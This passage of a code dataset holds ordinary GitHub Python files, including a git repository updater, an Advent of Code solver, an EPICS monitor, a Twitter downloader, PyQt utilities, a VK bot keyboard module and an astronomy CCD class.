to determine which absolute paths should not be fetched. \\\nIf the repo's path matches an exclude pattern, that repo will be excluded from even if \\\nit matches one of the include patterns.\"\n )\n cli.add_argument(\n \"-s\",\n \"--skip\",\n action=\"store_true\",\n help=\"Skip a remote if an error occurs while fetching it.\"\n )\n cli.add_argument(\n \"-y\",\n \"--yes\",\n \"--assume-yes\",\n action=\"store_true\",\n help=\"Automatically assumes 'yes' as answer to the prompt asking whether to update the \\\nof repos.\"\n )\n return cli\n\n\ndef update(repo: Repo, skip_error: bool = False) -> int:\n tqdm.write(f\"Updating {repo.working_dir}\")\n count = 0\n for remote in repo.remotes:\n tqdm.write(f\" {remote.name} -> {remote.url}\")\n try:\n remote.fetch(verbose=True)\n except Exception as e:\n if skip_error:\n tqdm.write(\"An error occurred trying to fetch the remote!\")\n tqdm.write(str(e))\n else:\n raise e\n else:\n count += 1\n return count\n\n\ndef main():\n cli = make_parser()\n args = cli.parse_args()\n \n # argparse 'append' behaviour stores list of lists,\n # cannot use 'extend' because we are targetting python 3.7\n directories: t.List[Path] = args.directories[0]\n if len(directories) == 0:\n directories.append(Path(\".\"))\n \n pfilter = Filter(includes=args.include, excludes=args.exclude)\n \n repos: t.List[Repo] = list(Walker(directories, args.recursive, pfilter))\n print(\"Found these repositories:\")\n for repo in repos:\n print(f\" -> {repo.working_dir}\")\n if not confirm(\"These repositories will be updated. 
Do you want to continue?\", args.yes):\n print(\"Aborting!\")\n return\n remote_count = 0\n for r in tqdm(repos, unit=\"repo\"):\n remote_count += update(r, args.skip)\n print(f\"Updated {len(repos)} repositories and fetched {remote_count} remotes.\")","repo_name":"RenoirTan/GitOut","sub_path":"gitout/update/_cli.py","file_name":"_cli.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31847547907","text":"import os\r\nimport re\r\nimport sys\r\n\r\n\r\nINSTRUCTION_PATTERN = re.compile(\r\n r'(?P\\w{3}) (?P[\\+\\-]{1}\\d+)\\n?')\r\n\r\n\r\ndef instruction_acc(runtime, argument):\r\n return {**runtime, \"acc\": runtime[\"acc\"] + argument}\r\n\r\n\r\ndef instruction_jmp(runtime, argument):\r\n return {**runtime, \"pointer\": runtime[\"pointer\"] + argument}\r\n\r\n\r\ndef instruction_nop(runtime, argument):\r\n return runtime\r\n\r\n\r\nINSTRUCTIONS = {\r\n \"acc\": instruction_acc,\r\n \"nop\": instruction_nop,\r\n \"jmp\": instruction_jmp,\r\n}\r\n\r\n\r\ndef parse_program(stream):\r\n specs = (INSTRUCTION_PATTERN.match(line) for line in stream)\r\n return [{\"instruction\": spec.group('instruction'), \"argument\": int(spec.group('argument'))} for spec in specs]\r\n\r\n\r\ndef run_program(program):\r\n history = []\r\n runtime = {\"pointer\": 0, \"acc\": 0}\r\n\r\n while runtime[\"pointer\"] < len(program):\r\n pointer = runtime[\"pointer\"]\r\n argument = program[pointer][\"argument\"]\r\n run_instruction = INSTRUCTIONS[program[pointer][\"instruction\"]]\r\n runtime = run_instruction(runtime, argument)\r\n runtime[\"pointer\"] = pointer + \\\r\n 1 if pointer == runtime[\"pointer\"] else runtime[\"pointer\"]\r\n\r\n if runtime[\"pointer\"] in history:\r\n break\r\n\r\n history.append(pointer)\r\n\r\n return runtime\r\n\r\n\r\ndef swap_at_line(program, line_number):\r\n swapped = {**program[line_number], \"instruction\": \"nop\" if program[line_number]\r\n [\"instruction\"] == \"jmp\" else \"jmp\"}\r\n return program[:line_number] + [swapped] + program[line_number + 1:]\r\n\r\n\r\nprogram = parse_program(sys.stdin)\r\n\r\nprint(\"solution 1:\", run_program(program)[\"acc\"])\r\n\r\nswappable_lines = (line_number for line_number, spec in enumerate(\r\n program) if spec[\"instruction\"] in [\"nop\", \"jmp\"])\r\nedited_programs = (swap_at_line(program, line_number)\r\n for line_number in swappable_lines)\r\nruntimes = (run_program(edited_program) for edited_program in edited_programs)\r\nfinished_runtimes = [\r\n runtime for runtime in runtimes if runtime[\"pointer\"] == len(program)]\r\n\r\nprint(\"solution 2:\", finished_runtimes[0][\"acc\"])\r\n","repo_name":"dawee/advent-of-code-2020","sub_path":"day-8/resolve.py","file_name":"resolve.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"1919183478","text":"#!/usr/bin/env python\n'''Module for monitoring PVs and displaying stats to the terminal.\n\nThis is based heavily on a script written by Daniel Duke in 2015 for\nmonitoring PVs during scans for the fuel spray project.\nThe main changes in this module are making it a module, rather \nthan a stand-alone script.\n\nAlan Kastengren, XSD, APS\nStarted: January 30, 2017\n'''\n#Imports\nimport epics\nimport time\nimport sys\nimport termcolor\nimport colorama\n\n# Reporting interval and poll time in s.\n_print_interval = 5 #Time = _print_interval * _poll_time\n_poll_time = 1\n_header_interval = 5 #Time = _print_interval * _poll_time * _header_interval\n\n#Globals to store names of monitored PVs and limits\nstored_PV_names = []\nstored_PV_desc = []\nstored_PV_obj = []\nhigh_limits = []\nlow_limits = []\n\n#Globals giving PV to actuate and how to set it\nactive_PV = None\naction_PV = None\npause_value = 1\nresume_value = 0\n\n#Initiate colorama\ncolorama.init()\n\ndef add_PV(pv_name,upper_limit,lower_limit):\n '''Add a PV to be monitored.\n \n Inputs:\n pv_name: name of the PV to be added to our monitor list\n upper_limit: value for PV at which alarm will occur\n lower_limit: value for PV at which alarm will occur\n '''\n #Append these data to the existing global lists\n stored_PV_names.append(pv_name)\n high_limits.append(upper_limit)\n low_limits.append(lower_limit)\n #Make PV objects and store them\n stored_PV_obj.append(epics.PV(pv_name+'.VAL'))\n #Try to find a description to add\n desc = epics.caget(pv_name+'.DESC')\n if desc:\n stored_PV_desc.append(desc)\n else:\n stored_PV_desc.append(pv_name)\n return\n\ndef start_monitoring():\n #Infinite loop\n try:\n i = 0 #Loop counter\n while True:\n #Set up a flag to see if we alarm on any PVs\n bad_value = False\n #If we aren't active, just bide our time\n if epics.caget(active_PV)==1:\n termcolor.cprint('Scan not running', 'yellow')\n else:\n #Check the values of all of the PVs being monitored\n for current_PV,high_lim,low_lim,current_desc in zip(\n stored_PV_obj,high_limits,low_limits,stored_PV_desc):\n #If limits are exceeded, print to terminal and \n if current_PV.value >= high_lim:\n termcolor.cprint( '%s above set limit!' % current_desc , \n 'red' , attrs={'bold':True} )\n bad_value = True\n elif current_PV.value <= low_lim:\n termcolor.cprint( '%s below set limit!' 
% current_desc , \n 'blue' , attrs={'bold':True} )\n bad_value = True\n #Either pause or resume based on these results\n if bad_value:\n epics.caput(action_PV,pause_value,wait=True)\n termcolor.cprint(\"Scan paused!\",'yellow')\n sys.stdout.write('\\a')\n else:\n if epics.caget(action_PV) == pause_value:\n epics.caput(action_PV,resume_value,wait=True)\n termcolor.cprint(\"Scan resumed!\",'green')\n i == 0\n \n #Are we ready to print out the header info\n if not i % (_print_interval * _header_interval):\n print(80*'#')\n print(\"\")\n header_line = '{:12s}'.format('Time')\n for desc in stored_PV_desc:\n header_line += '{:16s}'.format(desc)\n termcolor.cprint(header_line,'grey')\n if not i % _print_interval:\n print_line = '{:12s}'.format(time.strftime(\"%H:%M:%S\",time.localtime()))\n for current_PV in stored_PV_obj:\n if abs(current_PV.value) > 1000 or abs(current_PV.value) < 0.01:\n print_line += '{:<16.3e}'.format(current_PV.value)\n else:\n print_line += '{:<16.3f}'.format(current_PV.value)\n termcolor.cprint(print_line,'green')\n #Increment counter and sleep for _poll_interval seconds.\n i += 1\n time.sleep(_poll_time)\n except KeyboardInterrupt():\n print(\"Interrupted by keyboard\")\n return\n ","repo_name":"aps-7bm/PyEpics_Scripting_Library","sub_path":"PV_Monitor.py","file_name":"PV_Monitor.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24281089098","text":"import os\nimport json\nimport requests\nimport argparse\nfrom tqdm import tqdm\nfrom datetime import datetime, timedelta\n\n# credentials\nimport config\nAPI_KEY = config.API_KEY\nAPI_SECRET = config.API_SECRET\nBEARER_TOKEN = config.BEARER_TOKEN\n\n\ndef get_end_time(start_time):\n \"\"\"\n param: start_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n return: end_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n \"\"\"\n start_time = datetime.strptime(start_time, '%Y-%m-%dT%H:%M:%S.000Z')\n end_time = start_time + timedelta(hours=1)\n return end_time.strftime('%Y-%m-%dT%H:%M:%S.000Z')\n\n\ndef get_tweets_v2(start_time, end_time, max_results, query_type):\n \"\"\"\n param: \n start_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n end_time: string, format: YYYY-MM-DDTHH:MM:SSZ\n max_results: int, max number of tweets to return\n query_type: string, 'user' or 'keyword'\n return:\n tweets: list of tweets\n \"\"\"\n headers = {'Authorization': 'Bearer {}'.format(BEARER_TOKEN)}\n\n if query_type == 'user':\n userlist = input('Enter a list of username, separated by commas:')\n userlist = userlist.split(',')\n results = []\n for user in userlist:\n # find tweets by user\n url = 'https://api.twitter.com/2/tweets/search/recent?query=from%3A{}&start_time={}&end_time={}&max_results={}&tweet.fields=author_id,created_at,text'.format(\n user, start_time, end_time, max_results)\n response = requests.request('GET', url, headers=headers)\n\n if response.json()['meta']['result_count'] > 0:\n results.extend(response.json()['data'])\n return results\n elif query_type == 'keyword':\n keyword = input('Enter a keyword:')\n if max_results <= 100:\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results={}&tweet.fields=author_id,created_at,text'.format(\n keyword, start_time, end_time, max_results)\n response = requests.request('GET', url, headers=headers)\n\n if 'data' in response.json():\n return response.json()['data']\n else:\n return []\n else:\n # if max_results > 100, we need to loop through the pages\n results = []\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results=100&tweet.fields=author_id,created_at,text'.format(\n keyword, start_time, end_time)\n response = requests.request('GET', url, headers=headers)\n if 'data' in response.json():\n results.extend(response.json()['data'])\n\n # check if there are more pages\n if 'next_token' in response.json()['meta']:\n next_token = response.json()['meta']['next_token']\n else:\n next_token = None\n\n # pagination\n with tqdm(total=max_results) as pbar:\n while next_token and len(results) < max_results:\n url = 'https://api.twitter.com/2/tweets/search/recent?query={}&start_time={}&end_time={}&max_results=100&tweet.fields=author_id,created_at,text&next_token={}'.format(\n keyword, start_time, end_time, next_token)\n response = requests.request('GET', url, headers=headers)\n\n if 'data' in response.json():\n results.extend(response.json()['data'])\n\n # check if there are more pages\n if 'meta' in response.json() and 'next_token' in response.json()['meta']:\n next_token = response.json()['meta']['next_token']\n else:\n print('No more tweets')\n next_token = None\n pbar.update(100)\n\n return results\n\n\ndef export2file(tweets, folder):\n \"\"\"\n param:\n tweets: list of tweets\n folder: string, folder to save the tweets\n \"\"\"\n if not os.path.exists(folder):\n # create folder if not exist\n os.makedirs(folder)\n # save tweets to a file\n with 
open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(tweets, f)\n else:\n if os.path.exists('{}/tweets.txt'.format(folder)):\n # append to existing file\n with open('{}/tweets.txt'.format(folder), 'r') as f:\n old_tweets = json.load(f)\n old_tweets.extend(tweets)\n with open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(old_tweets, f)\n else:\n # save tweets to a file\n with open('{}/tweets.txt'.format(folder), 'w') as f:\n json.dump(tweets, f)\n\n\nif __name__ == '__main__':\n # parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--query-type', help='query type',\n choices=['keyword', 'user'], required=True)\n parser.add_argument(\n '--date', help='start date, format: YYYY-MM-DD', required=True, type=str)\n parser.add_argument(\n '--hour', help='start hour, format: HH', type=int, required=True)\n parser.add_argument('--max-results', help='max results',\n required=True, type=int)\n\n # initialize variables\n args = parser.parse_args()\n start_time = '{}T{:02d}:00:00.000Z'.format(args.date, args.hour)\n end_time = get_end_time(start_time)\n\n # get tweets from start date to end date\n tweets = get_tweets_v2(start_time, end_time,\n args.max_results, args.query_type)\n\n folder = 'tweets/date={}/hour={}'.format(args.date, args.hour)\n export2file(tweets, folder)\n","repo_name":"iblh/tweets-analyzer","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":5738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"40689642466","text":"\"\"\"empty message\n\nRevision ID: 1e2b88d5c846\nRevises: c14de92ddd0f\nCreate Date: 2022-04-12 17:48:17.435105\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1e2b88d5c846'\ndown_revision = 'c14de92ddd0f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('quotes', sa.Column('char_count', sa.Integer(), nullable=False))\n op.drop_column('quotes', 'title')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('quotes', sa.Column('title', sa.VARCHAR(length=100), autoincrement=False, nullable=False))\n op.drop_column('quotes', 'char_count')\n # ### end Alembic commands ###\n","repo_name":"j00nk1/aa-solo-project-capstone","sub_path":"migrations/versions/20220412_174817_.py","file_name":"20220412_174817_.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21942061289","text":"import ctypes\nfrom ctypes import *\n\n# lib = ctypes.cdll.LoadLibrary(\"C://Users//xmgd//Desktop//MT16//11_15_DLL_64//smncsftmt.dll\")\nlib = ctypes.cdll.LoadLibrary(r\"D:\\MT16\\11_9_DLL\\smncsftmt.dll\")\n\n# 初始化\ndll_init = lib.InitDll\ndll_init()\n\ndll_usbconnect = lib.USBConnected\ndll_usbconnect.argtypes = [c_int]\ndll_usbconnect.restypes = c_int\nprint(\"USB连接测试:\", dll_usbconnect(0))\n\n# 设置数据采集时间\ndll_setstatisticstime = lib.SetStatisticsTime\ndll_setstatisticstime.argtypes = [c_int, c_float]\ndll_setstatisticstime.restypes = c_int\n# dll_setstatisticstime(6, 3.0)\nprint(\"设置数据采集时间:\", dll_setstatisticstime(6, 1.0))\n\n# 设置文件保存方式\ndll_setfilemode = lib.SetFileMode\ndll_setfilemode.argtypes = [c_int, c_int, c_int]\ndll_setfilemode.restypes = c_int\n# dll_setfilemode(6, 1, 1)\nprint(\"设置文件保存方式:\", dll_setfilemode(6, 1, 1))\n\n# 设置统计周期\ndll_setittrinterval = lib.SetITTRInterval\ndll_setittrinterval.argtypes = [c_int, c_int, c_int]\nprint(\"设置统计周期:\", dll_setittrinterval(0, 0, 1000))\n\n# 设置采集数据文件保存路径\ndll_setfilepath = lib.SetFilePath\ndll_setfilepath.argtypes = [c_int, c_int, POINTER(c_char)]\ndll_setfilepath.restypes = c_int\npath_char = (c_char*64)(*bytes(\"D:\\MT16_PATH\", \"utf-8\"))\nprint(\"设置采集数据文件保存路径:\", dll_setfilepath(0, 6, path_char))\n\n# 使能ITTR模式\ndll_enableittr = lib.EnableITTR\ndll_enableittr.argtypes = [c_int, c_int, c_int]\nprint(\"使能ITTR模式:\", dll_enableittr(0, 0, 1))\n\n\n#设置停止方式\ndll_setittrendmode = lib.SetITTREndMode\ndll_setittrendmode.argtypes = [c_int, c_int]\nprint(\"设置停止方式:\", dll_setittrendmode(1, 100))\n\n# 开始任务\ndll_starttask = lib.StartTask\ndll_starttask.argtypes = [c_int]\ndll_starttask.restypes = c_int\n# dll_starttask(6)\nprint(\"开始任务:\", dll_starttask(6))\n# # 判断任务是否执行完成\ndll_istaskcompleted = lib.IsTaskCompleted\ndll_istaskcompleted.restypes = c_int\nwhile True:\n if dll_istaskcompleted() == 0:\n break\n# 反初始化\ndll_uninitdll = lib.UnInitDll\n# dll_uninitdll()\nprint(\"反初始化:\", dll_uninitdll())\n\n","repo_name":"qinyuanhao17/asg_cw_odmr","sub_path":"ft1040_example.py","file_name":"ft1040_example.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18503652181","text":"import pytest\n\nfrom pimp_my_engine.core.dtypes.data_queue import DataQueue\n\nclass TestDataQueue(object):\n \n def test_add_and_pop(self):\n dq = DataQueue()\n element = [1,2,3]\n dq.add(element)\n element_queue = dq.pop()\n assert element_queue == element\n\n def test_add_different_types(self):\n dq = DataQueue()\n elements = ['a', [1,2,3], 2323]\n dq.add(elements[0])\n dq.add(elements[1])\n dq.add(elements[2])\n for _ in range(3):\n assert dq.pop() == elements.pop()\n\n def test_erase(self):\n dq = DataQueue()\n element = 1\n dq.add(element)\n dq.erase()\n assert dq.is_empty() == True\n\n def test_pop_from_emptylist(self):\n with pytest.raises(IndexError):\n dq = DataQueue()\n dq.pop()\n\n\n","repo_name":"r00ta/pimp-my-engine","sub_path":"pimp_my_engine/tests/test_data_queue.py","file_name":"test_data_queue.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"17657733346","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom win32api import GetSystemMetrics\nimport os\nimport subprocess\nfrom PIL import Image\nimport time\nimport platform\nimport shutil\n\nclass UtilTools(object):\n def __init__(self):\n super().__init__()\n\n def get_desktop_size(self):\n return (GetSystemMetrics (0),GetSystemMetrics (1))\n\n def is_number(self,s):\n try:\n float(s)\n return True\n except ValueError:\n pass\n return False\n \n def sysDefaultOpen(self, filePath):\n plat = platform.system()\n if plat == 'Darwin':\n subprocess.call(['open'], filePath)\n elif plat == 'Linux':\n subprocess.call(['xdg-open'], filePath)\n else:\n os.startfile(filePath)\n\n def clearTempFile(self):\n current_dir = os.path.dirname(os.path.abspath(__file__))\n tempPath = os.path.join(current_dir,'static/temp/') \n try:\n if os.path.exists(tempPath):\n shutil.rmtree(tempPath)\n os.mkdir(tempPath)\n else:\n os.makedirs(tempPath)\n except:\n pass\n\n def copyFile(self,oldFile,newFile):\n #以二进制方式打开视频\n v_src = open(oldFile,'rb')\n #读取视频中所有数据\n content = v_src.read()\n #创建复制出来的文件\n v_copy = open(newFile,'wb')\n #写入\n v_copy.write(content)\n #关闭操作\n v_src.close()\n v_copy.close()\n\n\nclass ClipBoard(QWidget):\n def __init__(self):\n super(ClipBoard,self).__init__()\n self.utils = UtilTools()\n self.initUI()\n \n def initUI(self):\n d_w,d_h=self.utils.get_desktop_size()\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setWindowState(Qt.WindowMaximized )\n self.imageLabel=QLabel()\n layout = QGridLayout()\n layout.setContentsMargins(0,0,0,0) #设置布局没有边缘空白\n self.imageLabel.setScaledContents(True)\n self.imageLabel.setMaximumSize(d_w*0.9,d_h*0.8)\n layout.addWidget(self.imageLabel,2,2)\n self.setLayout(layout)\n self.setWindowTitle('截图图片展示')\n\n def pasteImage(self):\n self.utils.clearTempFile()\n clipboard = QApplication.clipboard()\n if clipboard.mimeData().hasImage():\n try:\n qt_img = clipboard.image()\n pil_img = Image.fromqimage(qt_img) # 转换为PIL图像\n current_dir = os.path.dirname(os.path.abspath(__file__))\n temPath = os.path.join(current_dir,'static/temp/'+str(int(round(time.time() * 1000)))+'.png') \n pil_img.save(temPath, \"PNG\")\n self.utils.sysDefaultOpen(temPath)\n except: \n self.show()\n self.imageLabel.setPixmap(clipboard.pixmap())#从剪贴板获得图片\n\nclass SaveVideo(QWidget):\n def __init__(self):\n super().__init__()\n self.utils = UtilTools()\n \n def save(self,videoUrl,videoPathName):\n desktopPath = os.path.join(os.path.expanduser('~'),\"Desktop\")\n desktopPathUrl = os.path.join(desktopPath,videoPathName) \n filename = QFileDialog.getSaveFileName(self,'保存录屏',desktopPathUrl) \n if filename[0]:\n self.utils.copyFile(videoUrl,filename[0])\n\nclass AboutAuthor(QWidget):\n def __init__(self):\n super().__init__()\n self.utils = UtilTools()\n self.app_width = 300\n self.app_height = 300\n self.initUI()\n \n def initUI(self): #初始化界面UI\n self.setFixedSize(self.app_width, self.app_height);\n self.resize(self.app_width, self.app_height)\n self.setWindowTitle('关于作者') \n self.setPostion()\n current_dir = os.path.dirname(os.path.abspath(__file__))\n iconPath = os.path.join(current_dir,'static/icon.png') \n self.setWindowIcon(QIcon(iconPath)) \n vLayout = QVBoxLayout()\n # 创建控件\n self.txtEdit = QTextEdit()\n self.txtEdit.setFocusPolicy(Qt.NoFocus)\n vLayout.addWidget(self.txtEdit)\n self.setLayout(vLayout)\n self.txtEdit.setHtml(\"Alex,四年多web前端!\")\n\n def setPostion(self): #设置窗口位置 \n d_w,d_h=self.utils.get_desktop_size()\n 
self.move((d_w-self.app_width) / 2,(d_h-self.app_height) / 2)\n\n","repo_name":"AceAZhe/py-tools","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"11359469481","text":"from player import Player\n\nimport random\n\n\nclass Game:\n def __init__(self, player: Player, words: list[str], solution: str = None):\n self.player = player\n self.guesses = []\n self.wrong_guesses = 0\n self.guess_count = 0\n self.words = words\n self.solution = solution if solution in words else random.choice(words)\n\n def play(self):\n state = self.build_state()\n\n while state != self.solution:\n guess = self.player.guess(state, self.guesses, self.words)\n\n for c in guess:\n if c not in self.guesses:\n self.guess_count += 1\n self.guesses.append(c)\n if guess not in self.solution:\n self.wrong_guesses += 1\n\n state = self.build_state()\n\n return self.guess_count, self.wrong_guesses\n\n def build_state(self) -> str:\n state = [c if c in self.guesses else '_' for c in self.solution]\n return ''.join(state)\n","repo_name":"S-Tim/hangman","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"71829246766","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MCDropout(nn.Module):\n def __init__(self, n_layers, p):\n super(MCDropout, self).__init__()\n self.layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n for in_features, out_features in zip(n_layers[:-1], n_layers[1:])\n ])\n self.p = p\n\n def forward(self, x):\n # do not perform dropout on the input layer\n x = F.relu(self.layers[0](x))\n\n for layer in self.layers[1:-1]:\n x = F.relu(layer(F.dropout(x, self.p, training=True)))\n\n x = self.layers[-1](F.dropout(x, self.p, training=True))\n\n return x\n","repo_name":"tomveh/uncertainty","sub_path":"models/MCDropout.py","file_name":"MCDropout.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"41063608952","text":"import json\nimport os\nfrom vk_bot.db.conf import get_db_manager\n\n\nclass Button:\n def __init__(self, label, button_type=\"text\", color=\"secondary\"):\n self.label = label\n self.button_type = button_type\n self.color = color\n self.count = 0\n\n def as_json(self):\n return {\n \"action\": {\n \"type\": self.button_type,\n \"label\": self.label\n },\n \"color\": self.color\n }\n\n def __str__(self):\n return f'Button(label={self.label}, type={self.button_type}, color={self.color})'\n\n\nclass VKeyboard:\n def __init__(self, path, one_time=False):\n self.one_time = one_time\n self.path = path\n self.count = -1\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, filename):\n if not filename.endswith('json'):\n raise ValueError(\"Формат файла клавиатуры должен быть json.\")\n\n if 'keyboards_json' not in os.listdir():\n os.makedirs('keyboards_json')\n\n self._path = os.path.join('keyboards_json', filename)\n\n with open(self._path, 'w', encoding='utf-8') as f:\n data = {\n \"one_time\": self.one_time,\n \"buttons\": []\n }\n\n json.dump(data, f, indent=4)\n\n def set_data(self, json_data):\n with open(self.path, 'w', encoding='utf-8') as f:\n json.dump(json_data, f, indent=4)\n\n def add_button(self, button):\n json_data = self.get_data(to_vk=False)\n if self.count == -1:\n json_data['buttons'].append([button.as_json()])\n self.count += 1\n self.set_data(json_data)\n else:\n json_data['buttons'][-1].append(button.as_json())\n self.set_data(json_data)\n self.count = -1\n\n def add_row(self, *args):\n buttons_list = []\n\n for button in args:\n buttons_list.append({\n \"action\": {\n \"type\": button.button_type,\n \"label\": button.label\n },\n \"color\": button.color\n })\n\n json_data = self.get_data(to_vk=False)\n\n json_data['buttons'].append(buttons_list)\n\n self.set_data(json_data)\n\n def get_data(self, to_vk=False):\n if to_vk:\n self.add_row(Button(label=\"Меню 🔍\", color=\"positive\"), Button(label=\"Назад 🛑\", color=\"negative\"))\n\n with open(self.path, 'r', encoding='utf-8') as f:\n return f.read() if to_vk else json.loads(f.read())\n\n\ndef make_main_menu_kb():\n menu_kb = VKeyboard('menu.json', one_time=False)\n b1 = Button(label='Категории')\n\n menu_kb.add_button(b1)\n\n return menu_kb\n\n\ndef make_categories_kb():\n categories_keyboard = VKeyboard('categories.json', one_time=False)\n for cat in get_db_manager().get_categories():\n categories_keyboard.add_button(Button(label=cat.name, color=\"primary\"))\n\n return categories_keyboard\n\n\ndef make_products_kb(message):\n products_keyboard = VKeyboard('products.json', one_time=False)\n for product in get_db_manager().get_products(message.text):\n\n products_keyboard.add_button(Button(label=product.name))\n\n return products_keyboard\n\n","repo_name":"777boeing777/vk_baking_bot","sub_path":"keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"28465849372","text":"from numpy import *\nfrom utils.term import *\nfrom classes.shot import Shot\nfrom classes.triplet import Triplet\nfrom classes.block import Block\n\nclass CCD():\n __slots__ = ('__dict__','uid','id','data','shot','triplet','block','dataPath',\n 'sky_background','background_average','background_median','background_std','background_proportion',\n 'fwhm',\n 'apcor_inner_radius', 'apcor_outer_radius', 'apcor_factorn', 'apcor_uncertainty',\n 'zeropoint',\n 'trans_mat')\n\n all = {}\n lastID = 0\n\n \"\"\"\n ___ _ _ \n |_ _|_ __ (_) |_ \n | || '_ \\| | __|\n | || | | | | |_ \n |___|_| |_|_|\\__|\n \n \"\"\"\n\n def __init__(self, id = None, data:ndarray = None, shot:Shot = None, triplet:Triplet = None, block:Block = None, dataPath:str = None):\n self.uid :str = f\"{shot.id}p{id}\"\n self.id :int = id\n self.data :ndarray = data\n self.shot :Shot = shot\n self.triplet :Triplet = triplet\n self.block :Block = block\n self.dataPath :str = dataPath\n self.sky_background :ndarray = None\n self.background_median :float = None\n self.background_average :float = None\n self.background_std :float = None\n self.background_proportion :float = None\n self.fwhm :float = None\n self.apcor_inner_radius :float = None\n self.apcor_outer_radius :float = None\n self.apcor_factor :float = None\n self.apcor_uncertainty :float = None\n self.zeropoint :float = None\n self.trans_mat :ndarray = None\n\n if self not in shot.ccdList:\n shot.ccdList.append(self)\n\n if self.uid in CCD.all:\n raise ValueError(\"A CCD with this UID already exist\")\n else:\n CCD.all.update({self.uid:self})\n\n \"\"\"\n ____ _ _ _ \n / ___|___ _ __ ___ _ __ _ _| |_ __ _| |_(_) ___ _ __ ___ \n | | / _ \\| '_ ` _ \\| '_ \\| | | | __/ _` | __| |/ _ \\| '_ \\/ __|\n | |__| (_) | | | | | | |_) | |_| | || (_| | |_| | (_) | | | \\__ \\\n \\____\\___/|_| |_| |_| .__/ \\__,_|\\__\\__,_|\\__|_|\\___/|_| |_|___/\n |_| \n \"\"\"\n\n def compute_sky_background(self, verbose = False, prefix = \"\"):\n \"\"\"This function compute the sky background\"\"\"\n img = self.data\n \n if img is None:\n print(f\"/!\\ CCD{self.id} contain no data (shot n°{self.shot.id}, triplet {self.triplet.id})\\n -> {self.shot.dataPath}\")\n return\n\n for i in range(3):\n a = mean(img[img!=0]); s = std(img[img!=0])\n if verbose: print(f\"{prefix}Loop {i}: Median={round(median(img),2)}, Average={round(a,2)}, Standrad deviation={round(s,2)}\")\n img = img * (img < a+3*s) * (img > a-3*s)\n\n m = median(img); a = mean(img[img!=0]); s = std(img[img!=0])\n if verbose: print(f\"{prefix}Loop {i}: Median={round(m,2)}, Average={round(a,2)}, Standrad deviation={round(s,2)}\")\n\n sizeX, sizeY = img.shape\n\n self.sky_background = img\n self.background_median = m\n self.background_average = a\n self.background_std = s\n self.background_proportion = sum(img!=0) / (sizeX*sizeY)\n \n def mp_compute_sky_background(ccd, totalCCD=-1, verbose=False, prefix=\"\"):\n \"\"\"Allow to parrallelize the call of sky_backgroud()\"\"\"\n\n if verbose == 2: print(f\"{prefix}Computing sky background of CCD {int(ccd.id)}...\")\n if verbose == True: progressbar(int(ccd.id) / (totalCCD-1), prefix=prefix)\n\n ccd.compute_sky_background()\n\n if verbose == 2: print(f\"{prefix}Sky background of CCD {int(ccd.id)} computed.\")\n\n def computeFWHM(self):\n pass # TODO\n\n def computeAPCOR(self):\n pass # TODO\n\n \"\"\"\n _ _ _ _ _ \n | | | | |_(_) |___ \n | | | | __| | / __|\n | |_| | |_| | \\__ \\\n \\___/ \\__|_|_|___/\n \n \"\"\"\n\n # As the CCD can contain a lot of data, this 
